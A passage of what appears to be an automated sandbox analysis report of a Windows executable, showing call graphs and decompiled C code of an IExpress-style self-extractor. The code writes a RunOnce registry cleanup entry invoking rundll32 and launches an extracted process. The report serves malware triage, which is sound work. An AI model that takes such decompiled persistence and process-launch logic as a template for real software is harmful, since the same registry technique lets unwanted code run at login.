CreateProcessA 2971->2972 2983 384106 2971->2983 2973 384041 WaitForSingleObject GetExitCodeProcess 2972->2973 2974 3840c4 2972->2974 2980 384070 2973->2980 2976 386285 GetLastError 2974->2976 2975 386ce0 4 API calls 2977 384117 2975->2977 2979 3840c9 GetLastError FormatMessageA 2976->2979 2977->2677 2982 3844b9 20 API calls 2979->2982 3042 38411b 2980->3042 2981 384096 CloseHandle CloseHandle 2981->2983 2984 3840ba 2981->2984 2982->2983 2983->2975 2984->2983 2986 3864c2 2985->2986 2987 38658a CharPrevA 2986->2987 2988 3864d8 GetFileAttributesA 2987->2988 2989 3864ea 2988->2989 2990 386501 LoadLibraryA 2988->2990 2989->2990 2992 3864ee LoadLibraryExA 2989->2992 2991 386508 2990->2991 2993 386ce0 4 API calls 2991->2993 2992->2991 2994 386513 2993->2994 2994->2681 2996 382289 RegOpenKeyExA 2995->2996 2997 382381 2995->2997 2996->2997 2999 3822b1 RegQueryValueExA 2996->2999 2998 386ce0 4 API calls 2997->2998 3000 38238c 2998->3000 3001 382374 RegCloseKey 2999->3001 3002 3822e6 memset GetSystemDirectoryA 2999->3002 3000->2673 3001->2997 3003 38230f 3002->3003 3004 382321 3002->3004 3005 38658a CharPrevA 3003->3005 3006 38171e _vsnprintf 3004->3006 3005->3004 3007 38233f RegSetValueExA 3006->3007 3007->3001 3010 381a9a 3009->3010 3012 381aba 3010->3012 3014 381aaf 3010->3014 3028 38667f 3010->3028 3012->2907 3013 38667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 382be6 3015->3016 3017 382ad4 GetModuleFileNameA 3015->3017 3018 386ce0 4 API calls 3016->3018 3027 382b02 3017->3027 3020 382bf5 3018->3020 3019 382af1 IsDBCSLeadByte 3019->3027 3020->2925 3021 382bca CharNextA 3023 382bd3 CharNextA 3021->3023 3022 382b11 CharNextA CharUpperA 3024 382b8d CharUpperA 3022->3024 3022->3027 3023->3027 3024->3027 3026 382b43 CharPrevA 3026->3027 3027->3016 3027->3019 3027->3021 3027->3022 3027->3023 3027->3026 3033 3865e8 3027->3033 3029 386689 3028->3029 3030 3866a5 3029->3030 3031 386648 IsDBCSLeadByte 3029->3031 3032 386697 CharNextA 3029->3032 3030->3010 3031->3029 3032->3029 3034 3865f4 3033->3034 3034->3034 3035 3865fb CharPrevA 3034->3035 3036 386611 CharPrevA 3035->3036 3037 38660b 3036->3037 3038 38661e 3036->3038 3037->3036 3037->3038 3039 38663d 3038->3039 3040 386634 CharNextA 3038->3040 3041 386627 CharPrevA 3038->3041 3039->3027 3040->3039 3041->3039 3041->3040 3043 38412a 3042->3043 3044 384132 3042->3044 3043->2981 3046 381ea7 3044->3046 3047 381eba 3046->3047 3049 381ed3 3046->3049 3048 38256d 15 API calls 3047->3048 3048->3049 3049->3043 3051 381ff0 RegOpenKeyExA 3050->3051 3052 382026 3050->3052 3051->3052 3053 38200f RegDeleteValueA RegCloseKey 3051->3053 3052->2320 3053->3052 3164 386a20 __getmainargs 3165 3819e0 3166 381a03 3165->3166 3167 381a24 GetDesktopWindow 3165->3167 3168 381a20 3166->3168 3171 381a16 EndDialog 3166->3171 3169 3843d0 11 API calls 3167->3169 3172 386ce0 4 API calls 3168->3172 3170 381a33 LoadStringA SetDlgItemTextA MessageBeep 3169->3170 3170->3168 3171->3168 3173 381a7e 3172->3173 3054 384ad0 3062 383680 3054->3062 3057 384ae9 3058 384aee WriteFile 3059 384b0f 3058->3059 3060 384b14 3058->3060 3060->3059 3061 384b3b SendDlgItemMessageA 3060->3061 3061->3059 3063 383691 MsgWaitForMultipleObjects 3062->3063 3064 3836e8 3063->3064 3065 3836a9 PeekMessageA 3063->3065 3064->3057 3064->3058 3065->3063 3066 3836bc 3065->3066 3066->3063 3066->3064 3067 3836c7 DispatchMessageA 3066->3067 3068 3836d1 PeekMessageA 3066->3068 3067->3068 3068->3066 3069 384cd0 3070 384d0b 3069->3070 3071 384cf4 3069->3071 3072 384d02 3070->3072 3075 384dcb 3070->3075 3078 384d25 3070->3078 3071->3072 3073 384b60 FindCloseChangeNotification 3071->3073 3074 386ce0 4 API calls 3072->3074 3073->3072 3076 384e95 3074->3076 3077 384dd4 SetDlgItemTextA 3075->3077 3079 384de3 3075->3079 3077->3079 3078->3072 3092 384c37 3078->3092 3079->3072 3097 38476d 3079->3097 3083 384e38 3083->3072 3085 384980 25 API calls 3083->3085 3084 384b60 FindCloseChangeNotification 3086 384d99 SetFileAttributesA 3084->3086 3087 384e56 3085->3087 3086->3072 3087->3072 3088 384e64 3087->3088 3106 3847e0 LocalAlloc 3088->3106 3091 384e6f 3091->3072 3093 384c4c DosDateTimeToFileTime 3092->3093 3094 384c88 3092->3094 3093->3094 3095 384c5e LocalFileTimeToFileTime 3093->3095 3094->3072 3094->3084 3095->3094 3096 384c70 SetFileTime 3095->3096 3096->3094 3115 3866ae GetFileAttributesA 3097->3115 3099 38477b 3099->3083 3100 3847cc SetFileAttributesA 3102 3847db 3100->3102 3102->3083 3103 386517 24 API calls 3104 3847b1 3103->3104 3104->3100 3104->3102 3105 3847c2 3104->3105 3105->3100 3107 38480f LocalAlloc 3106->3107 3108 3847f6 3106->3108 3111 384831 3107->3111 3114 38480b 3107->3114 3109 3844b9 20 API calls 3108->3109 3109->3114 3112 3844b9 20 API calls 3111->3112 3113 384846 LocalFree 3112->3113 3113->3114 3114->3091 3116 384777 3115->3116 3116->3099 3116->3100 3116->3103 3174 383210 3175 383227 3174->3175 3200 38328e EndDialog 3174->3200 3176 3833e2 GetDesktopWindow 3175->3176 3179 383235 3175->3179 3178 3843d0 11 API calls 3176->3178 3180 3833f1 SetWindowTextA SendDlgItemMessageA 3178->3180 3181 38324c 3179->3181 3182 3832dd GetDlgItemTextA 3179->3182 3191 383239 3179->3191 3183 38341f GetDlgItem EnableWindow 3180->3183 3180->3191 3185 383251 3181->3185 3186 3832c5 EndDialog 3181->3186 3184 383366 3182->3184 3192 3832fc 3182->3192 3183->3191 3188 3844b9 20 API calls 3184->3188 3187 38325c LoadStringA 3185->3187 3185->3191 3186->3191 3189 38327b 3187->3189 3190 383294 3187->3190 3188->3191 3195 3844b9 20 API calls 3189->3195 3212 384224 LoadLibraryA 3190->3212 3192->3184 3194 383331 GetFileAttributesA 3192->3194 3198 38337c 3194->3198 3199 38333f 3194->3199 3195->3200 3197 3832a5 SetDlgItemTextA 3197->3189 3197->3191 3201 38658a CharPrevA 3198->3201 3202 3844b9 20 API calls 3199->3202 3200->3191 3203 38338d 3201->3203 3204 383351 3202->3204 3205 3858c8 27 API calls 3203->3205 3204->3191 3206 38335a CreateDirectoryA 3204->3206 3207 383394 3205->3207 3206->3184 3206->3198 3207->3184 3208 3833a4 3207->3208 3209 3833c7 EndDialog 3208->3209 3210 38597d 34 API calls 3208->3210 3209->3191 3211 3833c3 3210->3211 3211->3191 3211->3209 3213 3843b2 3212->3213 3214 384246 GetProcAddress 3212->3214 3218 3844b9 20 API calls 3213->3218 3215 38425d GetProcAddress 3214->3215 3216 3843a4 FreeLibrary 3214->3216 3215->3216 3217 384274 GetProcAddress 3215->3217 3216->3213 3217->3216 3220 38428b 3217->3220 3219 38329d 3218->3219 3219->3191 3219->3197 3221 384295 GetTempPathA 3220->3221 3226 3842e1 3220->3226 3222 3842ad 3221->3222 3222->3222 3223 3842b4 CharPrevA 3222->3223 3224 3842d0 CharPrevA 3223->3224 3223->3226 3224->3226 3225 384390 FreeLibrary 3225->3219 3226->3225 3227 384a50 3228 384a9f ReadFile 3227->3228 3229 384a66 3227->3229 3230 384abb 3228->3230 3229->3230 3231 384a82 memcpy 3229->3231 3231->3230 3232 383450 3233 38345e 3232->3233 3234 3834d3 EndDialog 3232->3234 3236 38349a GetDesktopWindow 3233->3236 3240 383465 3233->3240 3235 38346a 3234->3235 3237 3843d0 11 API calls 3236->3237 3238 3834ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3237->3238 3238->3235 3239 38348c EndDialog 3239->3235 3240->3235 3240->3239 3117 386f40 SetUnhandledExceptionFilter 3118 384cc0 GlobalFree 3241 384200 3242 38420b SendMessageA 3241->3242 3243 38421e 3241->3243 3242->3243 3244 383100 3245 3831b0 3244->3245 3246 383111 3244->3246 3247 3831b9 SendDlgItemMessageA 3245->3247 3248 383141 3245->3248 3250 383149 GetDesktopWindow 3246->3250 3253 38311d 3246->3253 3247->3248 3249 383138 EndDialog 3249->3248 3251 3843d0 11 API calls 3250->3251 3252 38315d 6 API calls 3251->3252 3252->3248 3253->3248 3253->3249 3254 384bc0 3255 384bd7 3254->3255 3257 384c05 3254->3257 3256 384c1b SetFilePointer 3256->3255 3257->3255 3257->3256 3258 3830c0 3259 3830de CallWindowProcA 3258->3259 3260 3830ce 3258->3260 3261 3830da 3259->3261 3260->3259 3260->3261 3262 3863c0 3263 386407 3262->3263 3264 38658a CharPrevA 3263->3264 3265 386415 CreateFileA 3264->3265 3266 386448 WriteFile 3265->3266 3267 38643a 3265->3267 3268 386465 CloseHandle 3266->3268 3270 386ce0 4 API calls 3267->3270 3268->3267 3271 38648f 3270->3271 3272 386c03 3273 386c1e 3272->3273 3274 386c17 _exit 3272->3274 3275 386c27 _cexit 3273->3275 3276 386c32 3273->3276 3274->3273 3275->3276

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_00383A3F 18 Function_00386517 0->18 50 Function_003844B9 0->50 77 Function_0038468F 0->77 84 Function_00386285 0->84 1 Function_00386C3F 2 Function_00382630 2->50 103 Function_00386CE0 2->103 3 Function_00384C37 4 Function_00386E2A 89 Function_00386CF0 4->89 5 Function_0038202A 12 Function_0038171E 5->12 5->50 75 Function_0038658A 5->75 5->103 6 Function_00387120 7 Function_00386A20 8 Function_00384224 8->50 79 Function_00381680 8->79 9 Function_00383B26 9->18 67 Function_00386298 9->67 101 Function_00384FE0 9->101 10 Function_0038411B 66 Function_00381EA7 10->66 11 Function_00382F1D 11->0 11->9 13 Function_0038621E 11->13 32 Function_00384169 11->32 33 Function_0038256D 11->33 39 Function_00385164 11->39 11->50 58 Function_003855A0 11->58 62 Function_00383BA2 11->62 11->75 11->84 11->103 108 Function_003851E5 11->108 27 Function_0038597D 13->27 13->50 13->84 13->103 14 Function_0038681F 85 Function_003866F9 14->85 14->103 15 Function_00383210 15->8 15->27 15->50 15->75 111 Function_003843D0 15->111 112 Function_003858C8 15->112 16 Function_00387010 17 Function_00385C17 18->50 19 Function_00387208 20 Function_0038490C 21 Function_00387000 22 Function_00384200 23 Function_00383100 23->111 24 Function_00384702 53 Function_003816B3 24->53 24->79 25 Function_00386C03 48 Function_0038724D 25->48 26 Function_0038487A 26->20 27->50 76 Function_0038268B 27->76 27->84 27->103 28 Function_0038667F 47 Function_00386648 28->47 29 Function_00387270 30 Function_00386C70 31 Function_00382773 31->75 31->79 82 Function_00381781 31->82 31->103 32->50 32->77 104 Function_003824E0 33->104 34 Function_0038476D 34->18 57 Function_003866AE 34->57 35 Function_00386A60 35->1 35->19 37 Function_00387060 35->37 46 Function_00387155 35->46 35->48 86 Function_00382BFB 35->86 36 Function_00384B60 37->6 37->16 38 Function_00386760 39->50 39->67 39->77 40 Function_00385467 40->27 60 Function_003853A1 40->60 40->75 40->79 40->82 40->84 40->103 40->112 41 Function_00382267 41->12 41->75 41->103 42 Function_00384A50 43 Function_00383450 43->111 44 Function_00386952 45 Function_00386F54 45->19 45->48 49 Function_00386F40 50->12 50->14 50->79 50->103 115 Function_003867C9 50->115 51 Function_00386FBE 51->45 52 Function_003869B0 52->21 52->30 52->51 99 Function_003871EF 52->99 53->82 54 Function_003852B6 70 Function_00382390 54->70 54->82 94 Function_003865E8 54->94 54->103 107 Function_00381FE1 54->107 55 Function_00382CAA 55->18 55->50 64 Function_003818A3 55->64 69 Function_00385C9E 55->69 55->70 55->77 96 Function_003836EE 55->96 55->103 56 Function_00382AAC 56->79 56->94 56->103 114 Function_003817C8 56->114 58->2 58->18 58->27 58->40 58->44 58->50 58->75 58->77 58->82 58->84 58->103 59 Function_00384CA0 60->12 60->75 60->79 60->103 61 Function_00386FA1 62->5 62->41 62->50 73 Function_00386495 62->73 62->77 62->82 62->84 92 Function_00381AE8 62->92 98 Function_00383FEF 62->98 62->103 63 Function_003872A2 97 Function_003817EE 64->97 64->103 65 Function_00386FA5 65->48 66->33 67->12 67->103 68 Function_00384E99 68->79 69->4 69->17 69->28 69->50 69->75 69->79 102 Function_003831E0 69->102 69->103 113 Function_003866C8 69->113 70->53 70->70 70->75 70->79 70->103 71 Function_00381F90 71->50 71->66 71->103 72 Function_00386793 73->75 73->82 73->103 74 Function_00382A89 75->53 76->12 76->50 76->103 78 Function_00384980 78->26 78->50 79->82 80 Function_00383680 81 Function_00386380 83 Function_00381A84 83->28 86->11 86->54 86->55 86->71 87 Function_00384EFD 87->36 87->78 87->103 88 Function_003870FE 90 Function_003834F0 90->50 90->80 90->111 91 Function_00386EF0 92->12 92->50 92->53 92->56 92->75 92->79 92->82 92->83 92->103 92->113 93 Function_003828E8 93->31 93->74 95 Function_003870EB 96->14 96->50 96->74 96->93 96->103 96->115 97->103 98->10 98->50 98->84 98->103 100 Function_00386BEF 101->50 101->77 101->87 103->89 104->75 104->103 105 Function_003819E0 105->103 105->111 106 Function_003847E0 106->50 106->79 108->50 108->77 108->84 109 Function_00384AD0 109->80 110 Function_00384CD0 110->3 110->24 110->34 110->36 110->68 110->78 110->103 110->106 111->103 112->50 112->75 112->79 112->84 113->47 115->72 116 Function_00384CC0 117 Function_00384BC0 118 Function_003830C0 119 Function_003863C0 119->75 119->82 119->103

                                                Control-flow Graph

                                                C-Code - Quality: 93%
                                                			E0038202A(struct HINSTANCE__* __edx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				void* _v532;
                                                				int _v536;
                                                				int _v540;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t28;
                                                				long _t36;
                                                				long _t41;
                                                				struct HINSTANCE__* _t46;
                                                				intOrPtr _t49;
                                                				intOrPtr _t50;
                                                				CHAR* _t54;
                                                				void _t56;
                                                				signed int _t66;
                                                				intOrPtr* _t72;
                                                				void* _t73;
                                                				void* _t75;
                                                				void* _t80;
                                                				intOrPtr* _t81;
                                                				void* _t86;
                                                				void* _t87;
                                                				void* _t90;
                                                				_Unknown_base(*)()* _t91;
                                                				signed int _t93;
                                                				void* _t94;
                                                				void* _t95;
                                                
                                                				_t79 = __edx;
                                                				_t28 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t28 ^ _t93;
                                                				_t84 = 0x104;
                                                				memset( &_v268, 0, 0x104);
                                                				memset( &_v528, 0, 0x104);
                                                				_t95 = _t94 + 0x18;
                                                				_t66 = 0;
                                                				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                				if(_t36 != 0) {
                                                					L24:
                                                					return E00386CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                				}
                                                				_push(_t86);
                                                				_t87 = 0;
                                                				while(1) {
                                                					E0038171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                					_t95 = _t95 + 0x10;
                                                					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                					if(_t41 != 0) {
                                                						break;
                                                					}
                                                					_t87 = _t87 + 1;
                                                					if(_t87 < 0xc8) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				if(_t87 != 0xc8) {
                                                					GetSystemDirectoryA( &_v528, _t84);
                                                					_t79 = _t84;
                                                					E0038658A( &_v528, _t84, "advpack.dll");
                                                					_t46 = LoadLibraryA( &_v528); // executed
                                                					_t84 = _t46;
                                                					if(_t84 == 0) {
                                                						L10:
                                                						if(GetModuleFileNameA( *0x389a3c,  &_v268, 0x104) == 0) {
                                                							L17:
                                                							_t36 = RegCloseKey(_v532);
                                                							L23:
                                                							_pop(_t86);
                                                							goto L24;
                                                						}
                                                						L11:
                                                						_t72 =  &_v268;
                                                						_t80 = _t72 + 1;
                                                						do {
                                                							_t49 =  *_t72;
                                                							_t72 = _t72 + 1;
                                                						} while (_t49 != 0);
                                                						_t73 = _t72 - _t80;
                                                						_t81 = 0x3891e4;
                                                						do {
                                                							_t50 =  *_t81;
                                                							_t81 = _t81 + 1;
                                                						} while (_t50 != 0);
                                                						_t84 = _t73 + 0x50 + _t81 - 0x3891e5;
                                                						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3891e5);
                                                						if(_t90 != 0) {
                                                							 *0x388580 = _t66 ^ 0x00000001;
                                                							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                							if(_t66 == 0) {
                                                								_t54 = "%s /D:%s";
                                                							}
                                                							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                							E0038171E(_t90, _t84, _t54,  &_v268);
                                                							_t75 = _t90;
                                                							_t23 = _t75 + 1; // 0x1
                                                							_t79 = _t23;
                                                							do {
                                                								_t56 =  *_t75;
                                                								_t75 = _t75 + 1;
                                                							} while (_t56 != 0);
                                                							_t24 = _t75 - _t79 + 1; // 0x2
                                                							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                							RegCloseKey(_v532); // executed
                                                							_t36 = LocalFree(_t90);
                                                							goto L23;
                                                						}
                                                						_t79 = 0x4b5;
                                                						E003844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                						goto L17;
                                                					}
                                                					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                					_t66 = 0 | _t91 != 0x00000000;
                                                					FreeLibrary(_t84); // executed
                                                					if(_t91 == 0) {
                                                						goto L10;
                                                					}
                                                					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                						E0038658A( &_v268, 0x104, 0x381140);
                                                					}
                                                					goto L11;
                                                				}
                                                				_t36 = RegCloseKey(_v532);
                                                				 *0x388530 = _t66;
                                                				goto L23;
                                                			}

































                                                0x0038202a
                                                0x00382035
                                                0x0038203c
                                                0x00382041
                                                0x00382050
                                                0x0038205f
                                                0x00382064
                                                0x0038206f
                                                0x0038208c
                                                0x00382094
                                                0x00382257
                                                0x00382266
                                                0x00382266
                                                0x0038209a
                                                0x0038209b
                                                0x0038209d
                                                0x003820aa
                                                0x003820af
                                                0x003820c9
                                                0x003820d1
                                                0x00000000
                                                0x00000000
                                                0x003820d3
                                                0x003820da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x003820da
                                                0x003820e2
                                                0x00382103
                                                0x0038210e
                                                0x00382116
                                                0x00382122
                                                0x00382128
                                                0x0038212c
                                                0x00382179
                                                0x00382194
                                                0x003821de
                                                0x003821e4
                                                0x00382256
                                                0x00382256
                                                0x00000000
                                                0x00382256
                                                0x00382196
                                                0x00382196
                                                0x0038219c
                                                0x0038219f
                                                0x0038219f
                                                0x003821a1
                                                0x003821a2
                                                0x003821a6
                                                0x003821a8
                                                0x003821b0
                                                0x003821b0
                                                0x003821b2
                                                0x003821b3
                                                0x003821bc
                                                0x003821c7
                                                0x003821cb
                                                0x003821f1
                                                0x003821f6
                                                0x003821fd
                                                0x003821ff
                                                0x003821ff
                                                0x00382204
                                                0x00382213
                                                0x00382218
                                                0x0038221d
                                                0x0038221d
                                                0x00382220
                                                0x00382220
                                                0x00382222
                                                0x00382223
                                                0x00382229
                                                0x0038223d
                                                0x00382249
                                                0x00382250
                                                0x00000000
                                                0x00382250
                                                0x003821d2
                                                0x003821d9
                                                0x00000000
                                                0x003821d9
                                                0x0038213a
                                                0x00382141
                                                0x00382144
                                                0x0038214c
                                                0x00000000
                                                0x00000000
                                                0x00382163
                                                0x00382172
                                                0x00382172
                                                0x00000000
                                                0x00382163
                                                0x003820ea
                                                0x003820f0
                                                0x00000000

                                                APIs
                                                • memset.MSVCRT ref: 00382050
                                                • memset.MSVCRT ref: 0038205F
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0038208C
                                                  • Part of subcall function 0038171E: _vsnprintf.MSVCRT ref: 00381750
                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003820C9
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003820EA
                                                • GetSystemDirectoryA.KERNEL32 ref: 00382103
                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00382122
                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00382134
                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00382144
                                                • GetSystemDirectoryA.KERNEL32 ref: 0038215B
                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0038218C
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003821C1
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003821E4
                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0038223D
                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00382249
                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00382250
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                • API String ID: 178549006-1709460465
                                                • Opcode ID: 63958a73cd6076488cd78f9c4636de3ce70476aebc7658722f298013e27c6233
                                                • Instruction ID: aff19fdd7e57d1fdd3bdecec984b3e1f1c47598f798ffa017a457a632d4dd115
                                                • Opcode Fuzzy Hash: 63958a73cd6076488cd78f9c4636de3ce70476aebc7658722f298013e27c6233
                                                • Instruction Fuzzy Hash: C051D1B1A00318ABEB23BB60DC4DFEB776CEB45700F1001E9FA49E6151DA719E498B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 36 383ba2-383bd9 37 383bdb-383bee call 38468f 36->37 38 383bfd-383bff 36->38 44 383d13-383d30 call 3844b9 37->44 45 383bf4-383bf7 37->45 39 383c03-383c28 memset 38->39 41 383c2e-383c40 call 38468f 39->41 42 383d35-383d48 call 381781 39->42 41->44 53 383c46-383c49 41->53 48 383d4d-383d52 42->48 55 383f4d 44->55 45->38 45->44 51 383d9e-383db6 call 381ae8 48->51 52 383d54-383d6c call 38468f 48->52 51->55 69 383dbc-383dc2 51->69 52->44 65 383d6e-383d75 52->65 53->44 57 383c4f-383c56 53->57 59 383f4f-383f63 call 386ce0 55->59 61 383c58-383c5e 57->61 62 383c60-383c65 57->62 66 383c6e-383c73 61->66 67 383c75-383c7c 62->67 68 383c67-383c6d 62->68 71 383fda-383fe1 65->71 72 383d7b-383d98 CompareStringA 65->72 73 383c87-383c89 66->73 67->73 76 383c7e-383c82 67->76 68->66 74 383dc4-383dce 69->74 75 383de6-383de8 69->75 79 383fe8-383fea 71->79 80 383fe3 call 382267 71->80 72->51 72->71 73->48 82 383c8f-383c98 73->82 74->75 81 383dd0-383dd7 74->81 77 383f0b-383f15 call 383fef 75->77 78 383dee-383df5 75->78 76->73 95 383f1a-383f1c 77->95 85 383fab-383fd2 call 3844b9 LocalFree 78->85 86 383dfb-383dfd 78->86 79->59 80->79 81->75 89 383dd9-383ddb 81->89 83 383c9a-383c9c 82->83 84 383cf1-383cf3 82->84 91 383c9e-383ca3 83->91 92 383ca5-383ca7 83->92 84->51 94 383cf9-383d11 call 38468f 84->94 85->55 86->77 93 383e03-383e0a 86->93 89->78 96 383ddd-383de1 call 38202a 89->96 99 383cb2-383cc5 call 38468f 91->99 92->55 100 383cad 92->100 93->77 101 383e10-383e19 call 386495 93->101 94->44 94->48 103 383f1e-383f2d LocalFree 95->103 104 383f46-383f47 LocalFree 95->104 96->75 99->44 112 383cc7-383ce8 CompareStringA 99->112 100->99 113 383e1f-383e36 GetProcAddress 101->113 114 383f92-383fa9 call 3844b9 101->114 108 383f33-383f3b 103->108 109 383fd7-383fd9 103->109 104->55 108->39 109->71 112->84 115 383cea-383ced 112->115 116 383e3c-383e80 113->116 117 383f64-383f76 call 3844b9 FreeLibrary 113->117 126 383f7c-383f90 LocalFree call 386285 114->126 115->84 120 383e8b-383e94 116->120 121 383e82-383e87 116->121 117->126 124 383e9f-383ea2 120->124 125 383e96-383e9b 120->125 121->120 128 383ead-383eb6 124->128 129 383ea4-383ea9 124->129 125->124 126->55 130 383eb8-383ebd 128->130 131 383ec1-383ec3 128->131 129->128 130->131 133 383ece-383eec 131->133 134 383ec5-383eca 131->134 137 383eee-383ef3 133->137 138 383ef5-383efd 133->138 134->133 137->138 139 383eff-383f09 FreeLibrary 138->139 140 383f40 FreeLibrary 138->140 139->103 140->104
                                                C-Code - Quality: 82%
                                                			E00383BA2() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v276;
                                                				char _v280;
                                                				short _v300;
                                                				intOrPtr _v304;
                                                				void _v348;
                                                				char _v352;
                                                				intOrPtr _v356;
                                                				signed int _v360;
                                                				short _v364;
                                                				char* _v368;
                                                				intOrPtr _v372;
                                                				void* _v376;
                                                				intOrPtr _v380;
                                                				char _v384;
                                                				signed int _v388;
                                                				intOrPtr _v392;
                                                				signed int _v396;
                                                				signed int _v400;
                                                				signed int _v404;
                                                				void* _v408;
                                                				void* _v424;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t69;
                                                				signed int _t76;
                                                				void* _t77;
                                                				signed int _t79;
                                                				short _t96;
                                                				signed int _t97;
                                                				intOrPtr _t98;
                                                				signed int _t101;
                                                				signed int _t104;
                                                				signed int _t108;
                                                				int _t112;
                                                				void* _t115;
                                                				signed char _t118;
                                                				void* _t125;
                                                				signed int _t127;
                                                				void* _t128;
                                                				struct HINSTANCE__* _t129;
                                                				void* _t130;
                                                				short _t137;
                                                				char* _t140;
                                                				signed char _t144;
                                                				signed char _t145;
                                                				signed int _t149;
                                                				void* _t150;
                                                				void* _t151;
                                                				signed int _t153;
                                                				void* _t155;
                                                				void* _t156;
                                                				signed int _t157;
                                                				signed int _t162;
                                                				signed int _t164;
                                                				void* _t165;
                                                
                                                				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                				_t69 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t69 ^ _t164;
                                                				_t153 = 0;
                                                				 *0x389124 =  *0x389124 & 0;
                                                				_t149 = 0;
                                                				_v388 = 0;
                                                				_v384 = 0;
                                                				_t165 =  *0x388a28 - _t153; // 0x0
                                                				if(_t165 != 0) {
                                                					L3:
                                                					_t127 = 0;
                                                					_v392 = 0;
                                                					while(1) {
                                                						_v400 = _v400 & 0x00000000;
                                                						memset( &_v348, 0, 0x44);
                                                						_t164 = _t164 + 0xc;
                                                						_v348 = 0x44;
                                                						if( *0x388c42 != 0) {
                                                							goto L26;
                                                						}
                                                						_t146 =  &_v396;
                                                						_t115 = E0038468F("SHOWWINDOW",  &_v396, 4);
                                                						if(_t115 == 0 || _t115 > 4) {
                                                							L25:
                                                							_t146 = 0x4b1;
                                                							E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                							 *0x389124 = 0x80070714;
                                                							goto L62;
                                                						} else {
                                                							if(_v396 != 1) {
                                                								__eflags = _v396 - 2;
                                                								if(_v396 != 2) {
                                                									_t137 = 3;
                                                									__eflags = _v396 - _t137;
                                                									if(_v396 == _t137) {
                                                										_v304 = 1;
                                                										_v300 = _t137;
                                                									}
                                                									goto L14;
                                                								}
                                                								_push(6);
                                                								_v304 = 1;
                                                								_pop(0);
                                                								goto L11;
                                                							} else {
                                                								_v304 = 1;
                                                								L11:
                                                								_v300 = 0;
                                                								L14:
                                                								if(_t127 != 0) {
                                                									L27:
                                                									_t155 = 1;
                                                									__eflags = _t127 - 1;
                                                									if(_t127 != 1) {
                                                										L31:
                                                										_t132 =  &_v280;
                                                										_t76 = E00381AE8( &_v280,  &_v408,  &_v404); // executed
                                                										__eflags = _t76;
                                                										if(_t76 == 0) {
                                                											L62:
                                                											_t77 = 0;
                                                											L63:
